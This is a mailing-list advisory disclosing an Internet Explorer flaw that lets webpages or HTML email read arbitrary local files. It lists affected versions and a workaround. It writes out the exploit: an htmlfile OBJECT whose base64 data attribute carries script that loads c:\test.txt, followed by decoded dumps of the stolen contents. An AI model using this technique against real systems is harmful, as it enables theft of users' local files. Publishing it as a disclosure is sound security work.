Internet Explorer allows reading of local files by remote webpages

[Markus Kern <markus-kern () gmx net>]

Summary
-------

There is a vulnerability in MS Internet Explorer that allows
any webpage or HTML email to read arbitrary local files.
This bug may also lead to remote command execution.


Vulnerable versions
-------------------

All versions of IE seem to be affected. The following
configurations have been tested and are vulnerable:

Windows 2000 pro, IE 5.50
Windows 2000 pro SP2, IE 6.0, fully patched
Windows XP pro, IE 6.0


Workaround
----------

Disable ActiveX in Internet Explorer


Exploit details
---------------

The exploit is based on a very vague advisory postet to
vuln-dev () securityfocus com by NOMEN NESCIO SECURITY ALERT
<hush.little.baby () hushmail com> on 21/11/2001:
http://www.securityfocus.com/archive/82/241482

Marc Fossi <mfossi () securityfocus com> suggests that this may be
another way to exploit an old vulnerability discovered by
Georgi Guninski: http://www.securityfocus.com/bid/1718


First we create either a "htmlfile_FullWindowEmbed" or a
"htmlfile" object (both work):

<OBJECT ID="myObject"
CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13">
</OBJECT>

Ok, alert(myObject.outerHTML); gives us the following:

<OBJECT id=myObject
classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13
data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxwPiZuYnNw
OzwvcD4= ></OBJECT>

Decoding the Base64 string we get (hex dump):

20693325F903CF11 8FD000AA00686F13  .i3%.........ho.
3C703E266E627370 3B3C2F703E        <p>&nbsp;</p>

The first part is a GUID and the second one looks like HTML.
We inject the string
"<script>document.location.href="file://c:\\test.txt";</script>"
into the object using

<OBJECT ID="myObject"
CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13"
data="data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxzY3JpcHQ+
ZG9jdW1lbnQubG9jYXRpb24uaHJlZj0iZmlsZTovL2M6XFx0ZXN0LnR4dCI7PC9zY3JpcHQ+">
</OBJECT>

(There are probably easier ways to do this but I'm not very familiar
with IE coding).

Now to the the interesting part. After c:\test.txt is loaded we can
still access the data parameter of the object using myObject.outerHTML.
This time it contains the Base64 encoded version of c:\test.txt among
other things.

So doing a alert(myObject.outerHTML); after the local file is loaded
we get:

<OBJECT id=myObject
classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13
data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzwhRE9DV
FlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAgVHJhbnNpdGlvbmFsLy9
FTiI+DQo8SFRNTD48SEVBRD4NCjxNRVRBIGh0dHAtZXF1aXY9Q29udGVudC1UeXBlIGNvb
nRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD13aW5kb3dzLTEyNTIiPjwvSEVBRD4NCjxCT0R
ZPjxYTVA+aGVsbG8gd29ybGQ8L1hNUD48L0JPRFk+PC9IVE1MPg0K ></OBJECT>

with the Base64 string decoding to:

20693325F903CF11 8FD000AA00686F13  .i3%.........ho.
3C21444F43545950 452048544D4C2050  <!DOCTYPE.HTML.P
55424C494320222D 2F2F5733432F2F44  UBLIC."-//W3C//D
54442048544D4C20 342E30205472616E  TD.HTML.4.0.Tran
736974696F6E616C 2F2F454E223E0D0A  sitional//EN">..
3C48544D4C3E3C48 4541443E0D0A3C4D  <HTML><HEAD>..<M
4554412068747470 2D65717569763D43  ETA.http-equiv=C
6F6E74656E742D54 79706520636F6E74  ontent-Type.cont
656E743D22746578 742F68746D6C3B20  ent="text/html;.
636861727365743D 77696E646F77732D  charset=windows-
31323532223E3C2F 484541443E0D0A3C  1252"></HEAD>..<
424F44593E3C584D 503E68656C6C6F20  BODY><XMP>hello.
776F726C643C2F58 4D503E3C2F424F44  world</XMP></BOD
593E3C2F48544D4C 3E0D0A            Y></HTML>..    

where "hello world" is the contents of c:\test.txt.

It all boils down to an ordinary DOM circumvention with all the
usual implications.


Proof of concept exploit
------------------------

I have attached a zipped HTML file that reads c:\test.txt and
displays it.

regards,
Markus Kern

Attachment: htmlfile_FWE-exploit.zip
Description: